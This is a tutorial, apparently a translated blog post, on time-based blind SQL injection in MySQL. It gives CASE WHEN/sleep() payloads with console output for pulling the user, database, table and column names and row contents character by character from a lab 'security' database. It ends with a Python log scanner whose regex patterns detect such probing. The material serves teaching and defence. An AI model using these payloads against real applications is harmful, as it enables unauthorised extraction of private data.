0x00 Pattern to remember

and case when(substring(<expression> from 1 for 1)=<condition>) then sleep(5) else 0 end;

0x01 Basic information

  mysql> select version();
  +-----------+
  | version() |
  +-----------+
  | 5.5.53    |
  +-----------+
  1 row in set (0.27 sec)
  mysql> select user();
  +----------------+
  | user()         |
  +----------------+
  | root@localhost |
  +----------------+
  1 row in set (0.00 sec)
  mysql> select database();
  +------------+
  | database() |
  +------------+
  | security   |
  +------------+
  1 row in set (0.00 sec)

0x02 Getting the length of the data

  mysql> select length(user());
  +----------------+
  | length(user()) |
  +----------------+
  |             14 |
  +----------------+
  1 row in set (0.00 sec)

Database statement: select * from users where id=1 and case when(length(user())=14) then sleep(5) else 0 end;

  mysql> select * from users where id=1 and case when(length(user())=14) then sleep(5) else 0 end;
  Empty set (5.01 sec)

0x03 Reading the database version / current user / current database

Note: the same pattern reads any content, one character at a time, by changing the position passed to substring().
For example:
select substring(user() from 1 for 1) = r
select substring(user() from 2 for 1) = o

Database statement: select * from users where id=1 and case when(substring(user() from 1 for 1)='r') then sleep(5) else 0 end;

  mysql> select * from users where id=1 and case when(substring(user() from 1 for 1)='r') then sleep(5) else 0 end;
  Empty set (5.01 sec)

When the guess is correct the response is delayed by 5 seconds; once a 5-second delay is observed, the guess can be judged correct.

0x04 Guessing database names

Note: changing OFFSET 0 selects a different database name.
For example:
0 gives the 1st database
1 gives the 2nd database

  // sample data
  mysql> SELECT schema_name FROM information_schema.schemata LIMIT 0,1;
  +--------------------+
  | schema_name        |
  +--------------------+
  | information_schema |
  +--------------------+
  1 row in set (0.00 sec)

Read the first character of the 1st database name: select * from users where id=1 and case when(substring((SELECT schema_name FROM information_schema.schemata LIMIT 1 OFFSET 0) from 1 for 1)='i') then sleep(5) else 0 end;

  mysql> select * from users where id=1 and case when(substring((SELECT schema_name FROM information_schema.schemata LIMIT 1 OFFSET 0) from 1 for 1)='i') then sleep(5) else 0 end;
  Empty set (5.01 sec)

Read the second character of the 1st database name: select * from users where id=1 and case when(substring((SELECT schema_name FROM information_schema.schemata LIMIT 1 OFFSET 0) from 2 for 1)='n') then sleep(5) else 0 end;

  mysql> select * from users where id=1 and case when(substring((SELECT schema_name FROM information_schema.schemata LIMIT 1 OFFSET 0) from 2 for 1)='n') then sleep(5) else 0 end;
  Empty set (5.00 sec)

0x05 Guessing table names

Note: changing table_schema=xxx to another database dumps that database's tables.
For example:
table_schema=database() reads the tables of the currently connected database
table_schema='test' reads the tables of the test database

Note: changing OFFSET 0 selects a different table name.

  mysql> SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 4 OFFSET 0;
  +------------+
  | table_name |
  +------------+
  | emails     |
  | referers   |
  | uagents    |
  | users      |
  +------------+
  4 rows in set (0.00 sec)
  mysql> SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 2 OFFSET 0;
  +------------+
  | table_name |
  +------------+
  | emails     |
  | referers   |
  +------------+
  2 rows in set (0.00 sec)

For example:
0 gives the 1st table
1 gives the 2nd table

  // sample data
  mysql> SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1;
  +------------+
  | table_name |
  +------------+
  | emails     |
  +------------+
  1 row in set (0.00 sec)

Database statement, reading the first character of the first table name in the current database: select * from users where id=1 and case when(substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 1 OFFSET 0) from 1 for 1)='e') then sleep(5) else 0 end;

  mysql> select * from users where id=1 and case when(substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 1 OFFSET 0) from 1 for 1)='e') then sleep(5) else 0 end;
  Empty set (5.01 sec)

Database statement, reading the second character of the first table name in the current database: select * from users where id=1 and case when(substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 1 OFFSET 0) from 2 for 1)='m') then sleep(5) else 0 end;

  mysql> select * from users where id=1 and case when(substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 1 OFFSET 0) from 2 for 1)='m') then sleep(5) else 0 end;
  Empty set (5.02 sec)

0x06 Guessing column names

table_schema = 'xx' is the database to dump
table_name = 'xx' is the table to dump

OFFSET 0 is the position (column index) to dump

For example, if table tdb_admin has the columns id, username, password:
limit 0 = id
limit 1 = username
limit 2 = password

  // sample data
  mysql> SELECT column_name FROM information_schema.columns where table_schema='security' and table_name='users' limit 0,1;
  +-------------+
  | column_name |
  +-------------+
  | id          |
  +-------------+
  1 row in set (0.00 sec)

Guess the first character of the first column name of the users table in the security database: select * from users where id=1 and case when(substring((SELECT column_name FROM information_schema.columns where table_schema='security' and table_name='users' LIMIT 1 OFFSET 0) from 1 for 1)='i') then sleep(5) else 0 end;

  mysql> select * from users where id=1 and case when(substring((SELECT column_name FROM information_schema.columns where table_schema='security' and table_name='users' LIMIT 1 OFFSET 0) from 1 for 1)='i') then sleep(5) else 0 end;
  Empty set (5.01 sec)

Guess the second character of the first column name of the users table in the security database: select * from users where id=1 and case when(substring((SELECT column_name FROM information_schema.columns where table_schema='security' and table_name='users' LIMIT 1 OFFSET 0) from 2 for 1)='d') then sleep(5) else 0 end;

  mysql> select * from users where id=1 and case when(substring((SELECT column_name FROM information_schema.columns where table_schema='security' and table_name='users' LIMIT 1 OFFSET 0) from 2 for 1)='d') then sleep(5) else 0 end;
  Empty set (5.00 sec)

0x07 Guessing contents

OFFSET 0: which row to read (index starts at 0)
from 1: which character of that value to read

  // sample data
  mysql> SELECT * FROM users LIMIT 1 OFFSET 0;
  +----+----------+----------+
  | id | username | password |
  +----+----------+----------+
  |  1 | Dumb     | Dumb     |
  +----+----------+----------+
  1 row in set (0.00 sec)

Read the first character of a given column in a given table of a given database: select * from users where id=1 and case when(substring((SELECT <column> FROM <database>.<table> LIMIT 1 OFFSET 0) from 1 for 1)='a') then sleep(5) else 0 end;

  mysql> select * from users where id=1 and case when(substring((SELECT username FROM security.users LIMIT 1 OFFSET 0) from 1 for 1)='D') then sleep(5) else 0 end;
  Empty set (5.00 sec)

Read the second character of a given column in a given table of a given database: select * from users where id=1 and case when(substring((SELECT username FROM security.users LIMIT 1 OFFSET 0) from 2 for 1)='u') then sleep(5) else 0 end;

  mysql> select * from users where id=1 and case when(substring((SELECT username FROM security.users LIMIT 1 OFFSET 0) from 2 for 1)='u') then sleep(5) else 0 end;
  Empty set (5.01 sec)
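Every statement in sections 0x02 to 0x07 has the same shape: a CASE WHEN wrapping sleep(), a substring() probe of one character, and usually a subquery against information_schema. As an added example (not part of the original post), the following Python scans constructed MySQL general-log-style lines for exactly that shape and groups the hits per connection, which is how a defender would spot the repeated probing from the server side. The log line format, the sample lines and the indicator names are assumptions made here.

```python
import re

# Constructed sample lines in MySQL general-log style (not taken from the original page).
SAMPLE_LOG = """\
2024-01-01T10:00:01.000001Z   12 Query  select * from users where id=1
2024-01-01T10:00:02.000001Z   12 Query  select * from users where id=1 and case when(length(user())=14) then sleep(5) else 0 end
2024-01-01T10:00:08.000001Z   12 Query  select * from users where id=1 and case when(substring((SELECT schema_name FROM information_schema.schemata LIMIT 1 OFFSET 0) from 1 for 1)='i') then sleep(5) else 0 end
2024-01-01T10:00:14.000001Z   13 Query  SELECT username FROM users WHERE id=2
2024-01-01T10:00:15.000001Z   12 Query  select * from users where id=1 and benchmark(5000000,md5('x'))
"""

# Indicators of the time-based blind pattern shown on this page: a delay function,
# a CASE WHEN guarding it, a one-character substring() probe, and metadata lookups.
INDICATORS = {
    "delay_function": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "conditional_delay": re.compile(r"\bcase\s+when\b.*\b(sleep|benchmark)\s*\(", re.I | re.S),
    "char_probe": re.compile(r"\bsubstring\s*\(.*\bfrom\s+\d+\s+for\s+1\b", re.I | re.S),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
}

LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<conn>\d+)\s+Query\s+(?P<sql>.*)$")

def classify(sql):
    """Return the names of all indicators matched by one SQL statement, in dict order."""
    return [name for name, rx in INDICATORS.items() if rx.search(sql)]

def scan_log(text):
    """Parse general-log lines; return (conn_id, indicators, sql) for delay-bearing queries."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        hits = classify(m.group("sql"))
        if "delay_function" in hits:
            findings.append((int(m.group("conn")), hits, m.group("sql")))
    return findings

def suspicious_connections(text, min_hits=2):
    """Connection ids that issued at least min_hits delay-bearing queries (repeated probing)."""
    counts = {}
    for conn, _hits, _sql in scan_log(text):
        counts[conn] = counts.get(conn, 0) + 1
    return sorted(c for c, n in counts.items() if n >= min_hits)
```

A single sleep() call can be legitimate, so the per-connection count is what separates probing from noise; pairing these hits with response-time outliers of about 5 seconds, as the page's "Empty set (5.01 sec)" timings show, confirms the signal.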